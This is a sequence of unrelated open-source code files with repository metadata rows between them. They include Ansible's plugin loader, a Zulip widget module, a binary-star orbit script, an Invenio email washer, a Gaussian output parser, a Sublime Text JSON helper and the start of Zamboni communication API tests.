base_name = splitname[0]
try:
extension = splitname[1]
except IndexError:
extension = ''
# Module found, now enter it into the caches that match
# this file
if base_name not in self._plugin_path_cache['']:
self._plugin_path_cache[''][base_name] = full_path
if full_name not in self._plugin_path_cache['']:
self._plugin_path_cache[''][full_name] = full_path
if base_name not in self._plugin_path_cache[extension]:
self._plugin_path_cache[extension][base_name] = full_path
if full_name not in self._plugin_path_cache[extension]:
self._plugin_path_cache[extension][full_name] = full_path
self._searched_paths.add(path)
try:
return pull_cache[name]
except KeyError:
# Didn't find the plugin in this directory. Load modules from
# the next one
pass
# if nothing is found, try finding alias/deprecated
if not name.startswith('_'):
alias_name = '_' + name
# We've already cached all the paths at this point
if alias_name in pull_cache:
if not os.path.islink(pull_cache[alias_name]):
display.deprecated('%s is kept for backwards compatibility '
'but usage is discouraged. The module '
'documentation details page may explain '
'more about this rationale.' %
name.lstrip('_'))
return pull_cache[alias_name]
return None
def has_plugin(self, name):
''' Checks if a plugin named name exists '''
return self.find_plugin(name) is not None
__contains__ = has_plugin
def _load_module_source(self, name, path):
if name in sys.modules:
# See https://github.com/ansible/ansible/issues/13110
return sys.modules[name]
with warnings.catch_warnings():
warnings.simplefilter("ignore", RuntimeWarning)
with open(path, 'r') as module_file:
module = imp.load_source(name, path, module_file)
return module
def get(self, name, *args, **kwargs):
''' instantiates a plugin of the given name using arguments '''
if name in self.aliases:
name = self.aliases[name]
path = self.find_plugin(name)
if path is None:
return None
if path not in self._module_cache:
self._module_cache[path] = self._load_module_source('.'.join([self.package, name]), path)
if kwargs.get('class_only', False):
obj = getattr(self._module_cache[path], self.class_name)
else:
obj = getattr(self._module_cache[path], self.class_name)(*args, **kwargs)
if self.base_class and self.base_class not in [base.__name__ for base in obj.__class__.__bases__]:
return None
return obj
def all(self, *args, **kwargs):
''' instantiates all plugins with the same arguments '''
for i in self._get_paths():
matches = glob.glob(os.path.join(i, "*.py"))
matches.sort()
for path in matches:
name, _ = os.path.splitext(path)
if '__init__' in name:
continue
if path not in self._module_cache:
self._module_cache[path] = self._load_module_source(name, path)
if kwargs.get('class_only', False):
obj = getattr(self._module_cache[path], self.class_name)
else:
obj = getattr(self._module_cache[path], self.class_name)(*args, **kwargs)
if self.base_class and self.base_class not in [base.__name__ for base in obj.__class__.__bases__]:
continue
# set extra info on the module, in case we want it later
setattr(obj, '_original_path', path)
yield obj
action_loader = PluginLoader(
'ActionModule',
'ansible.plugins.action',
C.DEFAULT_ACTION_PLUGIN_PATH,
'action_plugins',
required_base_class='ActionBase',
)
cache_loader = PluginLoader(
'CacheModule',
'ansible.plugins.cache',
C.DEFAULT_CACHE_PLUGIN_PATH,
'cache_plugins',
)
callback_loader = PluginLoader(
'CallbackModule',
'ansible.plugins.callback',
C.DEFAULT_CALLBACK_PLUGIN_PATH,
'callback_plugins',
)
connection_loader = PluginLoader(
'Connection',
'ansible.plugins.connection',
C.DEFAULT_CONNECTION_PLUGIN_PATH,
'connection_plugins',
aliases={'paramiko': 'paramiko_ssh'},
required_base_class='ConnectionBase',
)
shell_loader = PluginLoader(
'ShellModule',
'ansible.plugins.shell',
'shell_plugins',
'shell_plugins',
)
module_loader = PluginLoader(
'',
'ansible.modules',
C.DEFAULT_MODULE_PATH,
'library',
)
lookup_loader = PluginLoader(
'LookupModule',
'ansible.plugins.lookup',
C.DEFAULT_LOOKUP_PLUGIN_PATH,
'lookup_plugins',
required_base_class='LookupBase',
)
vars_loader = PluginLoader(
'VarsModule',
'ansible.plugins.vars',
C.DEFAULT_VARS_PLUGIN_PATH,
'vars_plugins',
)
filter_loader = PluginLoader(
'FilterModule',
'ansible.plugins.filter',
C.DEFAULT_FILTER_PLUGIN_PATH,
'filter_plugins',
)
test_loader = PluginLoader(
'TestModule',
'ansible.plugins.test',
C.DEFAULT_TEST_PLUGIN_PATH,
'test_plugins'
)
fragment_loader = PluginLoader(
'ModuleDocFragment',
'ansible.utils.module_docs_fragments',
os.path.join(os.path.dirname(__file__), 'module_docs_fragments'),
'',
)
strategy_loader = PluginLoader(
'StrategyModule',
'ansible.plugins.strategy',
None,
'strategy_plugins',
required_base_class='StrategyBase',
)
| gpl-3.0 | -5,174,014,401,932,513,000 | 33.837778 | 118 | 0.58219 | false | 4.195076 | true | false | false |
andersk/zulip | zerver/lib/widget.py | 3 | 3306 | import json
import re
from typing import Any, Optional, Tuple
from zerver.lib.message import SendMessageRequest
from zerver.models import Message, SubMessage
def get_widget_data(content: str) -> Tuple[Optional[str], Optional[str]]:
valid_widget_types = ["poll", "todo"]
tokens = content.split(" ")
# tokens[0] will always exist
if tokens[0].startswith("/"):
widget_type = tokens[0][1:]
if widget_type in valid_widget_types:
remaining_content = content.replace(tokens[0], "", 1).strip()
extra_data = get_extra_data_from_widget_type(remaining_content, widget_type)
return widget_type, extra_data
return None, None
def get_extra_data_from_widget_type(content: str, widget_type: Optional[str]) -> Any:
if widget_type == "poll":
# This is used to extract the question from the poll command.
# The command '/poll question' will pre-set the question in the poll
lines = content.splitlines()
question = ""
options = []
if lines and lines[0]:
question = lines.pop(0).strip()
for line in lines:
# If someone is using the list syntax, we remove it
# before adding an option.
option = re.sub(r"(\s*[-*]?\s*)", "", line.strip(), 1)
if len(option) > 0:
options.append(option)
extra_data = {
"question": question,
"options": options,
}
return extra_data
return None
def do_widget_post_save_actions(send_request: SendMessageRequest) -> None:
"""
This code works with the web app; mobile and other
clients should also start supporting this soon.
"""
message_content = send_request.message.content
sender_id = send_request.message.sender_id
message_id = send_request.message.id
widget_type = None
extra_data = None
widget_type, extra_data = get_widget_data(message_content)
widget_content = send_request.widget_content
if widget_content is not None:
# Note that we validate this data in check_message,
# so we can trust it here.
widget_type = widget_content["widget_type"]
extra_data = widget_content["extra_data"]
if widget_type:
content = dict(
widget_type=widget_type,
extra_data=extra_data,
)
submessage = SubMessage(
sender_id=sender_id,
message_id=message_id,
msg_type="widget",
content=json.dumps(content),
)
submessage.save()
send_request.submessages = SubMessage.get_raw_db_rows([message_id])
def get_widget_type(*, message_id: int) -> Optional[str]:
submessage = (
SubMessage.objects.filter(
message_id=message_id,
msg_type="widget",
)
.only("content")
.first()
)
if submessage is None:
return None
try:
data = json.loads(submessage.content)
except Exception:
return None
try:
return data["widget_type"]
except Exception:
return None
def is_widget_message(message: Message) -> bool:
    """Return True if this message has any submessages (i.e. is widgetized)."""
    # Right now all messages that are widgetized use submessage, and vice versa.
    return message.submessage_set.exists()
| apache-2.0 | -4,493,608,394,027,516,400 | 29.611111 | 88 | 0.605868 | false | 3.978339 | false | false | false |
hrichstein/phys_50733 | rh_project/polar_try.py | 1 | 5028 | import numpy as np
import matplotlib.pyplot as plt
# from scipy.constants import G
# Setting plotting parameters
from matplotlib import rc,rcParams
rc('text', usetex=True)
rc('axes', linewidth=2)
rc('font', weight='bold')
rc('font', **{'family': 'serif', 'serif':['Computer Modern']})
def find_vel_init(M1, M2, A):
    """Return the circular-orbit speed for masses M1, M2 at separation A.

    Relies on the module-level gravitational constant ``G``.
    """
    # Kepler's third law; the 365.25**2 factor presumably converts the
    # period from years to days (assumes G is in AU/yr/Msun units) --
    # TODO confirm the unit system.
    period = np.sqrt(4 * np.pi**2 * A**3 * 365.25**2 / G / (M1 + M2)) # period in days
    print(period)
    # Circumference over period gives the orbital speed.
    v = 2 * np.pi * A / period # AU/days
    return v
def orb_func(theta_arr):
    """Return the angular positions advanced by one angular-rate step.

    ``theta_arr`` holds the angles (degrees) of the two stars; ``G``,
    ``M1``, ``M2`` and ``r`` are module-level globals set by the script.
    """
    # How far apart these are to begin with
    # rsep = r**2 + r**2 - 2*r*r*np.cos((theta_arr[1]-theta_arr[0])*np.pi/180)
    # print(rsep)
    rsep = 0.2  # fixed separation; the dynamic form above is commented out
    # How much the angle changes.  (A first estimate,
    # ``G*(M1+M2)*r / rsep**2``, was immediately overwritten by the line
    # below, so that dead assignment has been removed.)
    d_theta = np.sqrt(G*M1*M2*rsep) / rsep**2 / np.sqrt(M1*M2/(M1+M2))
    # print("Linear velocity is {0}".format(r*d_theta))
    new_th_arr = d_theta + theta_arr
    return new_th_arr
A = 0.2 # AU
r = A/2 # semi-major axis & radius
# G = 4 * np.pi**2
G = 4 * np.pi**2  # gravitational constant (AU/yr/Msun units, presumably)
a = 0  # integration start time
b = .05  # integration end time
N = 100000  # number of RK4 steps
h = (b-a)/N  # timestep
M1 = 1  # stellar masses (solar masses)
M2 = 1
print(find_vel_init(M1,M2,r))
print("AU / min")
tpoints = np.arange(a, b, h)
theta_1 = 0  # initial angles in degrees: stars start diametrically opposed
theta_2 = 180
th_arr = np.array([theta_1, theta_2],dtype=float)
theta_points1 = [[] for tt in range(len(tpoints))]
theta_points2 = [[] for tt in range(len(tpoints))]
# Fourth-order Runge-Kutta integration of the two angular positions.
for tt in range(len(tpoints)):
    theta_points1[tt] = th_arr[0]
    theta_points2[tt] = th_arr[1]
    k1 = h * orb_func(th_arr)
    k2 = h * orb_func(th_arr + 0.5*k1)
    k3 = h * orb_func(th_arr + 0.5*k2)
    k4 = h * orb_func(th_arr + k3)
    th_arr += (k1 + 2*k2 + 2*k3 + k4) / 6
# Convert the sampled polar angles to Cartesian coordinates for plotting.
xpoints1 = [[] for tt in range(len(tpoints))]
ypoints1 = [[] for tt in range(len(tpoints))]
xpoints2 = [[] for tt in range(len(tpoints))]
ypoints2 = [[] for tt in range(len(tpoints))]
for tt in range(len(tpoints)):
    xpoints1[tt] = r * np.cos(theta_points1[tt] * np.pi/180)
    ypoints1[tt] = r * np.sin(theta_points1[tt] * np.pi/180)
    xpoints2[tt] = r * np.cos(theta_points2[tt] * np.pi/180)
    ypoints2[tt] = r * np.sin(theta_points2[tt] * np.pi/180)
# r1 = np.array([(r*np.cos(theta_1*np.pi/180)), (r*np.sin(theta_1*np.pi/180))])
# r2 = np.array([(r*np.cos(theta_2*np.pi/180)), (r*np.sin(theta_2*np.pi/180))])
# def plan_accel(s1, s2, p1):
# """
# s1: array-like
# x and y position of star 1
# s2: array-like
# x and y position of star 2
# p1: array-like
# x and y position of planet
# M1: integer-like (global variable)
# solar mass of each star (they're equal)
# """
# a_x = (-G * M1 * (p1[0]-s1[0]) / (np.sqrt((p1[0] - s1[0])**2) +\
# (p1[1] - s1[1])**2)**3)\
# +(-G * M2 * (p1[0]-s2[0]) / (np.sqrt((p1[0] - s2[0])**2) +\
# (p1[1] - s2[1])**2)**3)
# a_y = (-G * M1 * (p1[1]-s1[1]) / (np.sqrt((p1[0] - s1[0])**2) +\
# (p1[1] - s1[1])**2)**3)\
# +(-G * M2 * (p1[1]-s2[1]) / (np.sqrt((p1[0] - s2[0])**2) +\
# (p1[1] - s2[1])**2)**3)
# accel_arr = np.array([a_x, a_y])
# return accel_arr
# def plan_fun(param_array, s1, s2):
# """
# param_array: array-like
# param_array[0] = position of planet
# param_array[1] = velocity of planet
# s1: array-like
# x, y position of star 1
# s2: array-like
# x, y position of star 2
# Each of the above is array form with x and y components
# h: float-like
# global variable timestep
# """
# x0 = param_array[0][0]
# y0 = param_array[0][1]
# vx0 = param_array[1][0]
# vy0 = param_array[1][1]
# dx = vx0 * h
# dy = vy0 * h
# d_pos = np.array([dx,dy])
# # print(s1)
# # print(s2)
# # print(param_array[0])
# accel_vals = plan_accel(s1,s2,param_array[0])
# dvx = accel_vals[0] * h
# dvy = accel_vals[1] * h
# d_vel = np.array([dvx,dvy])
# d_arr = np.array([d_pos, d_vel])
# return d_arr
# v_plan_init = find_vel_init(1,0,20)
# # Initial position
# pl_x0 = 2
# pl_y0 = 0
# pl_pos = np.array([pl_x0, pl_y0])
# # Initial Velocity
# pl_vx0 = 0
# pl_vy0 = v_plan_init
# pl_vel = np.array([pl_vx0, pl_vy0])
# plan_params = np.array([pl_pos, pl_vel])
# xpoints_p = [[] for tt in range(len(tpoints))]
# ypoints_p = [[] for tt in range(len(tpoints))]
# for tt in range(len(tpoints)):
# s1_pos = np.array([xpoints1[tt],ypoints1[tt]])
# s2_pos = np.array([xpoints2[tt],ypoints2[tt]])
# xpoints_p[tt] = plan_params[0][0]
# ypoints_p[tt] = plan_params[0][1]
# k1 = h * plan_fun(plan_params, s1_pos, s2_pos)
# k2 = h * plan_fun(plan_params + 0.5*k1, s1_pos, s2_pos)
# k3 = h * plan_fun(plan_params + 0.5*k2, s1_pos, s2_pos)
# k4 = h * plan_fun(plan_params + k3, s1_pos, s2_pos)
# plan_params += (k1 + 2*k2 + 2*k3 + k4) / 6
# Plot the two stellar trajectories (circles of radius r about the origin).
plt.plot(xpoints1,ypoints1, label="Star 1")
plt.plot(xpoints2,ypoints2, label="Star 2")
# plt.plot(xpoints_p,ypoints_p, label="Planet")
plt.legend()
plt.show()
# # # Positions for three bodies initially
# # s1_0x = s1[0]
# # s1_0y = s1[1]
# # s2_0x = s2[0]
# # s2_0y = s2[1]
# # p_x = p[0]
# # p_y = p[1]
# # Velocities for three bodies initially
# s1_0v_x = v_s1[0]
# s1_0v_y = v_s1[1]
# s2_0v_x = v_s2[0]
# s2_0v_y = v_s2[1]
# p_v_x = v_p[0]
# p_v_y = v_p[1] | mit | -1,545,803,270,774,261,200 | 21.55157 | 83 | 0.568218 | false | 2.009592 | false | false | false |
NikolaYolov/invenio_backup | modules/webcomment/lib/webcomment_washer.py | 3 | 1706 | from invenio.htmlutils import HTMLWasher
import htmlentitydefs
class EmailWasher(HTMLWasher):
    """
    Wash comments before being sent by email.

    Whitelisted tags are rendered as plain-text equivalents (bullets for
    list items, ``<url>(label)`` for links); character and entity
    references are decoded to UTF-8 text whenever possible.
    """

    def handle_starttag(self, tag, attrs):
        """Function called for new opening tags"""
        if tag.lower() in self.allowed_tag_whitelist:
            if tag.lower() in ['ul', 'ol']:
                self.result += '\n'
            elif tag.lower() == 'li':
                self.result += '* '
            elif tag.lower() == 'a':
                # Render links as "<url>(label)"; the closing paren is
                # emitted by handle_endtag.
                for (attr, value) in attrs:
                    if attr.lower() == 'href':
                        self.result += '<' + value + '>' + '('

    def handle_endtag(self, tag):
        """Function called for ending of tags"""
        if tag.lower() in self.allowed_tag_whitelist:
            if tag.lower() in ['li', 'ul', 'ol']:
                self.result += '\n'
            elif tag.lower() == 'a':
                self.result += ')'

    def handle_startendtag(self, tag, attrs):
        """Function called for empty tags (e.g. <br />)"""
        self.result += ""

    def handle_charref(self, name):
        """Process character references of the form "&#ref;". Transform to text whenever possible."""
        # The parser hands us the text between "&#" and ";"; it may be
        # decimal ("8217") or hexadecimal ("x2019"/"X2019").  The old code
        # only handled decimal, silently dropping hex references.
        try:
            if name.lower().startswith('x'):
                code = int(name[1:], 16)
            else:
                code = int(name)
            self.result += unichr(code).encode("utf-8")
        except (ValueError, OverflowError):
            return

    def handle_entityref(self, name):
        """Process a general entity reference of the form "&name;".
        Transform to text whenever possible."""
        char_code = htmlentitydefs.name2codepoint.get(name, None)
        if char_code is not None:
            try:
                self.result += unichr(char_code).encode("utf-8")
            except (ValueError, OverflowError):
                return
| gpl-2.0 | 786,151,141,965,397,000 | 34.541667 | 101 | 0.521688 | false | 4.181373 | false | false | false |
tschijnmo/FFOMP | FFOMP/ccutils/gau2yaml.py | 1 | 10855 | """
Output conversion for Gaussian
==============================
This module contains conversion utilities that is solely written for the
Gaussian computational chemistry program.
.. autosummary::
:toctree:
gauout2PESyaml
"""
import collections
import re
from collections import abc
import itertools
import numpy as np
try:
from yaml import CDumper as Dumper
except ImportError:
from yaml import Dumper
from yaml import dump, YAMLError
#
# The drive function
# ------------------
#
def gauout2PESyaml(gauout_name, yaml_name,
                   energy_patt=r'^ SCF Done[^=]+=(?P<energy>[^A]+)A\.U',
                   ref_energy=0.0, symbs=None, mols=None, add_info=None):
    """Converts a Gaussian output file to a PES YAML file
    The atomic coordinates will be stored in the field ``atm_coords`` in input
    orientation in units of Angstrom. The SCF energy will be stored as
    ``static_energy`` in units of eV. The forces will be stored in
    ``atm_foces`` in the unit of eV/Angstrom.
    The atomic symbols and molecules will also be stored in ``atm_symbs`` and
    ``mols`` according to user input.
    :param str gauout_name: The name of the Gaussian output file.
    :param str yaml_name: The name of the YAML file to be written.
    :param str energy_patt: The pattern that can be used to grab the raw energy
        in Hartree. The energy needs to be in the named group ``energy`` and
        the last line matching the pattern with search will be used. Default to
        the SCF energy.
    :param float ref_energy: The reference energy to be subtracted from the raw
        energy, in Hartree.
    :param symbs: The symbols for the atoms in the output. By default the
        element symbol for the atomic numbers will be used. Or it can be given
        as a callable which will be called with the atomic index number and the
        default symbol to return the actual symbol of the atoms. An iterable
        can be given directly as well.
    :param mols: An iterable for the atomic indices of the molecules in the
        system. Elements in the iterable can be another iterable to give the
        actual indices of the atoms, or an integral number to show that the
        next n atoms will be a molecule. By default there is going to be just
        one molecule.
    :param dict add_info: The dictionary of additional information to add.
    :raises ValueError: if the input has got problems.
    :raises IOError: if something is wrong with the files.
    :returns: 0 for success.
    """
    # Parse the Gaussian output.
    parse_res = _parse_gauout(gauout_name, energy_patt)
    # The result dictionary.
    res = {}
    # The coordinates.
    res['atm_coords'] = parse_res.atm_coords.tolist()
    # The energy.  (Hartree -> eV after subtracting the reference.)
    res['static_energy'] = (
        parse_res.static_energy - ref_energy
    ) * _HARTREE2EV
    # The forces.  (Hartree/Bohr -> eV/Angstrom.)
    res['atm_forces'] = (
        parse_res.atm_forces * _HARTREE_P_BOHR2EV_P_ANGS
    ).tolist()
    atm_numbs = parse_res.atm_numbs
    # The symbols.
    res['atm_symbs'] = _gen_symbs(atm_numbs, symbs)
    # The molecules.
    res['mols'] = _gen_mols(atm_numbs, mols)
    if add_info is not None:
        res.update(add_info)
    # Dump to the YAML file.
    _dump2yaml(yaml_name, res)
    return 0
#
# Some unit conversion constants
# ------------------------------
#
# Conversion factor from Hartree to electron-volt.
_HARTREE2EV = 27.21139
# Conversion factor from Hartree/Bohr to eV/Angstrom (used for forces).
_HARTREE_P_BOHR2EV_P_ANGS = 51.42207
#
# Gaussian output parsing
# -----------------------
#
# Raw parse results of a Gaussian output: coordinates/forces as numpy
# arrays, the energy as a float, atomic numbers as a list of ints.
# Units are left as printed by Gaussian (no conversion applied here).
ParseRes = collections.namedtuple(
    'ParseRes', [
        'atm_coords',
        'static_energy',
        'atm_forces',
        'atm_numbs',
    ]
)
def _parse_gauout(gauout_name, energy_patt):
    """Parses the given Gaussian output file
    The results will be put in a named tuple. All units are *not* converted.
    And tensor properties like coordinates and forces will be in numpy arrays.
    :param str gauout_name: The name of the Gaussian output file to parse.
    :param str energy_patt: The energy pattern to grab the energy.
    :returns: The parse result.
    """
    # Open and read the file.
    try:
        with open(gauout_name, 'r') as gauout:
            lines = gauout.readlines()
    except IOError:
        raise
    # Get the energy, the easiest one.  The *last* matching line wins,
    # so multi-step outputs yield the final energy.
    compiled_energy_patt = re.compile(energy_patt)
    static_energy = None
    for line in lines:
        res = compiled_energy_patt.search(line)
        if res is None:
            continue
        else:
            static_energy = float(res.group('energy'))
            continue
    if static_energy is None:
        raise ValueError(
            'Energy failed to be read from {}'.format(gauout_name)
        )
    # Get the coordinates and the atomic numbers.
    # Table columns: index, atomic number, type, x, y, z.
    coords_lines = _get_lines_under_title(
        lines, r'^ +Input orientation: *$', r'^ *\d'
    )
    atm_numbs = []
    atm_coords = []
    for line in coords_lines:
        fields = line.split()
        atm_numbs.append(
            int(fields[1])
        )
        atm_coords.append(
            [float(i) for i in fields[3:6]]
        )
        continue
    atm_coords = np.array(atm_coords)
    # Get the forces.  Table columns: index, atomic number, Fx, Fy, Fz.
    forces_lines = _get_lines_under_title(
        lines, r'^ +\*+ +Axes restored to original set +\*+ *$', r'^ *\d'
    )
    atm_forces = []
    for line in forces_lines:
        fields = line.split()
        atm_forces.append(
            [float(i) for i in fields[2:5]]
        )
        continue
    atm_forces = np.array(atm_forces)
    return ParseRes(
        atm_coords=atm_coords, static_energy=static_energy,
        atm_forces=atm_forces, atm_numbs=atm_numbs,
    )
def _get_lines_under_title(lines, title_patt, content_patt):
"""Gets the lines under a title
If multiple titles are found, only the lines in the last section will be
returned.
:param lines: A sequence of lines.
:param title_patt: The pattern for the title.
:param content_patt: The pattern for the content lines.
:raises ValueError: If the title cannot be found.
:returns: The content lines following the title.
"""
# Compile the given patterns
compiled_title_patt = re.compile(title_patt)
compiled_content_patt = re.compile(content_patt)
# Find the location of the title.
title_loc = None
for idx, line in enumerate(lines):
if compiled_title_patt.search(line) is not None:
title_loc = idx
continue
else:
continue
if title_loc is None:
raise ValueError(
'The given title {} failed to be found'.format(title_patt)
)
# Gather the content lines following the title.
content_lines = []
started = False
for line in lines[title_loc:]:
if compiled_content_patt.search(line) is None:
if started:
break
else:
continue
else:
content_lines.append(line)
if not started:
started = True
return content_lines
#
# Symbols and molecules generation
# --------------------------------
#
def _gen_symbs(atm_numbs, symbs):
"""Generates the atomic symbols
By default, the element symbols will be used. If iterable is given its
content will be directly used. If callable is given, it will be called with
atomic index and default symbol to get the actual symbol.
"""
if isinstance(symbs, abc.Iterable):
symbs = list(symbs)
if len(symbs) != len(atm_numbs):
raise ValueError(
'The given symbols does not match the number of atoms!'
)
else:
default_symbs = [
_ELEMENT_SYMBS[i] for i in atm_numbs
]
if symbs is None:
symbs = default_symbs
else:
symbs = [
symbs(idx, default_symb)
for idx, default_symb in enumerate(default_symbs)
]
return symbs
def _gen_mols(atm_numbs, mols):
"""Generates the nested molecules list"""
if mols is None:
return [i for i, _ in enumerate(atm_numbs)]
else:
ret_val = []
# Get the molecules list.
curr_atm = 0
for i in mols:
if isinstance(i, int):
ret_val.append(
list(range(curr_atm, curr_atm + i))
)
curr_atm += i
else:
ret_val.append(
list(i)
)
curr_atm = max(i)
continue
# Check the correctness.
for i, j in itertools.zip_longest(
range(0, len(atm_numbs)),
sorted(itertools.chain.from_iterable(ret_val))
):
if i != j:
raise ValueError(
'Incorrect molecule specification, atom {} not correctly '
'given!'.format(i)
)
continue
return ret_val
_ELEMENT_SYMBS = {
1: "H",
2: "He",
3: "Li",
4: "Be",
5: "B",
6: "C",
7: "N",
8: "O",
9: "F",
10: "Ne",
11: "Na",
12: "Mg",
13: "Al",
14: "Si",
15: "P",
16: "S",
17: "Cl",
18: "Ar",
19: "K",
20: "Ca",
21: "Sc",
22: "Ti",
23: "V",
24: "Cr",
25: "Mn",
26: "Fe",
27: "Co",
28: "Ni",
29: "Cu",
30: "Zn",
31: "Ga",
32: "Ge",
33: "As",
34: "Se",
35: "Br",
36: "Kr",
37: "Rb",
38: "Sr",
39: "Y",
40: "Zr",
41: "Nb",
42: "Mo",
43: "Tc",
44: "Ru",
45: "Rh",
46: "Pd",
47: "Ag",
48: "Cd",
49: "In",
50: "Sn",
51: "Sb",
52: "Te",
53: "I",
54: "Xe",
55: "Cs",
56: "Ba",
57: "La",
58: "Ce",
59: "Pr",
60: "Nd",
61: "Pm",
62: "Sm",
63: "Eu",
64: "Gd",
65: "Tb",
66: "Dy",
67: "Ho",
68: "Er",
69: "Tm",
70: "Yb",
71: "Lu",
72: "Hf",
73: "Ta",
74: "W",
75: "Re",
76: "Os",
77: "Ir",
78: "Pt",
79: "Au",
80: "Hg",
81: "Tl",
82: "Pb",
83: "Bi",
84: "Po",
85: "At",
86: "Rn",
87: "Fr",
88: "Ra",
89: "Ac",
90: "Th",
91: "Pa",
92: "U",
93: "Np",
94: "Pu",
95: "Am",
96: "Cm",
97: "Bk",
98: "Cf",
99: "Es",
}
#
# Output generation
# -----------------
#
def _dump2yaml(yaml_name, content):
    """Dumps the content dictionary into a YAML file with the given name"""
    try:
        with open(yaml_name, 'w') as yaml_file:
            dump(content, stream=yaml_file, Dumper=Dumper)
    except IOError:
        # NOTE(review): re-raising a fresh IOError drops the original
        # errno/message -- consider chaining the original exception.
        raise IOError(
            'Invalid output file {}'.format(yaml_name)
        )
    except YAMLError:
        # Data that PyYAML cannot represent is reported as a ValueError.
        raise ValueError(
            'Invalid data to be dumped by YAML:\n{!r}'.format(content)
        )
| mit | 1,514,037,048,358,668,300 | 23.175947 | 79 | 0.551359 | false | 3.4736 | false | false | false |
randy3k/Project-Manager | json_file.py | 1 | 1374 | import sublime
import os
class JsonFile:
    """Read/write a settings file encoded with Sublime's value codec.

    Parent directories are created on demand and files are written with
    UNIX newlines, pretty-printed by ``sublime.encode_value``.
    """

    def __init__(self, fpath, encoding='utf-8'):
        self.encoding = encoding
        self.fpath = fpath

    def load(self, default=None):
        """Return the decoded file content.

        If the file does not exist it is created holding *default* and
        that value is returned; *default* also replaces a decoded but
        falsy value.  ``None`` means "a fresh empty list".
        """
        # The original signature used a mutable default (`default=[]`),
        # which is shared between calls and can be mutated by callers;
        # a None sentinel gives each call a fresh list.
        if default is None:
            default = []
        self.fdir = os.path.dirname(self.fpath)
        if not os.path.isdir(self.fdir):
            os.makedirs(self.fdir)
        if os.path.exists(self.fpath):
            with open(self.fpath, mode='r', encoding=self.encoding) as f:
                content = f.read()
            try:
                data = sublime.decode_value(content)
            except Exception:
                sublime.message_dialog('%s is bad!' % self.fpath)
                raise
            if not data:
                data = default
        else:
            with open(self.fpath, mode='w', encoding=self.encoding, newline='\n') as f:
                data = default
                f.write(sublime.encode_value(data, True))
        return data

    def save(self, data, indent=4):
        """Write *data* to the file, creating parent directories.

        ``indent`` is unused (``encode_value`` pretty-prints on its own)
        and is kept only for backward compatibility.
        """
        self.fdir = os.path.dirname(self.fpath)
        if not os.path.isdir(self.fdir):
            os.makedirs(self.fdir)
        with open(self.fpath, mode='w', encoding=self.encoding, newline='\n') as f:
            f.write(sublime.encode_value(data, True))

    def remove(self):
        """Delete the backing file if it exists."""
        if os.path.exists(self.fpath):
            os.remove(self.fpath)
| mit | -1,720,593,305,830,880,800 | 33.230769 | 87 | 0.520378 | false | 3.959654 | false | false | false |
spasovski/zamboni | mkt/comm/tests/test_api.py | 2 | 20871 | import json
import os
from django.conf import settings
from django.core import mail
from django.core.urlresolvers import reverse
from django.test.client import MULTIPART_CONTENT
from django.test.utils import override_settings
import mock
from nose.tools import eq_, ok_
from amo.tests import (addon_factory, req_factory_factory, user_factory,
version_factory)
from users.models import UserProfile
import mkt.constants.comm
from mkt.api.tests.test_oauth import RestOAuth
from mkt.comm.api import EmailCreationPermission, post_email, ThreadPermission
from mkt.comm.models import (CommAttachment, CommunicationNote,
CommunicationThread, CommunicationThreadCC)
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
# Directory of this test module and of its bundled attachment fixtures.
TESTS_DIR = os.path.dirname(os.path.abspath(__file__))
ATTACHMENTS_DIR = os.path.join(TESTS_DIR, 'attachments')
class CommTestMixin(object):
    """Factory helpers for creating communication threads and notes."""
    def _thread_factory(self, note=False, perms=None, no_perms=None, **kw):
        # Translate perm names into read_permission_<name> boolean fields.
        create_perms = {}
        for perm in perms or []:
            create_perms['read_permission_%s' % perm] = True
        for perm in no_perms or []:
            create_perms['read_permission_%s' % perm] = False
        kw.update(create_perms)
        thread = self.addon.threads.create(**kw)
        if note:
            # Optionally seed the thread with a default note.
            self._note_factory(thread)
        return thread
    def _note_factory(self, thread, perms=None, no_perms=None, **kw):
        # Author/body default to the test profile and a placeholder text.
        author = kw.pop('author', self.profile)
        body = kw.pop('body', 'something')
        create_perms = {}
        for perm in perms or []:
            create_perms['read_permission_%s' % perm] = True
        for perm in no_perms or []:
            create_perms['read_permission_%s' % perm] = False
        kw.update(create_perms)
        return thread.notes.create(author=author, body=body, **kw)
class AttachmentManagementMixin(object):
    """Helpers for building multipart POST data with attachment files."""
    def _attachments(self, num):
        """Generate and return data for `num` attachments """
        data = {}
        files = ['bacon.jpg', 'bacon.txt']
        descriptions = ['mmm, bacon', '']
        if num > 0:
            for n in xrange(num):
                # Alternate between the two fixture files.
                i = 0 if n % 2 else 1
                path = os.path.join(ATTACHMENTS_DIR, files[i])
                # NOTE: the handle is left open on purpose -- the test
                # client reads it when posting the multipart form.
                attachment = open(path, 'r+')
                data.update({
                    'form-%d-attachment' % n: attachment,
                    'form-%d-description' % n: descriptions[i]
                })
        return data
class TestThreadDetail(RestOAuth, CommTestMixin):
    """Tests for the comm-thread-detail endpoint (read perms, CC, PATCH)."""
    fixtures = fixture('webapp_337141', 'user_2519', 'user_support_staff')
    def setUp(self):
        super(TestThreadDetail, self).setUp()
        self.addon = Webapp.objects.get(pk=337141)
    def check_permissions(self, thread):
        # Evaluate ThreadPermission for the current profile on a fake request.
        req = req_factory_factory(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}),
            user=self.profile)
        return ThreadPermission().has_object_permission(
            req, 'comm-thread-detail', thread)
    def test_response(self):
        thread = self._thread_factory(note=True)
        res = self.client.get(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
        eq_(res.status_code, 200)
        eq_(len(res.json['recent_notes']), 1)
        eq_(res.json['addon'], self.addon.id)
    def test_recent_notes_perm(self):
        staff = UserProfile.objects.get(username='support_staff')
        self.addon.addonuser_set.create(user=self.profile)
        thread = self._thread_factory(read_permission_developer=True)
        self._note_factory(
            thread, perms=['developer'], author=staff, body='allowed')
        no_dev_note = self._note_factory(
            thread, no_perms=['developer'], author=staff)
        # Test that the developer can't access no-developer note.
        res = self.client.get(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
        eq_(res.status_code, 200)
        eq_(len(res.json['recent_notes']), 1)
        eq_(res.json['recent_notes'][0]['body'], 'allowed')
        eq_(res.json['addon'], self.addon.id)
        # Test that the author always has permissions.
        no_dev_note.update(author=self.profile)
        res = self.client.get(
            reverse('comm-thread-detail', kwargs={'pk': thread.pk}))
        eq_(len(res.json['recent_notes']), 2)
    def test_cc(self):
        # Test with no CC.
        thread = self._thread_factory()
        assert not self.check_permissions(thread)
        # Test with CC created.
        thread.thread_cc.create(user=self.profile)
        assert self.check_permissions(thread)
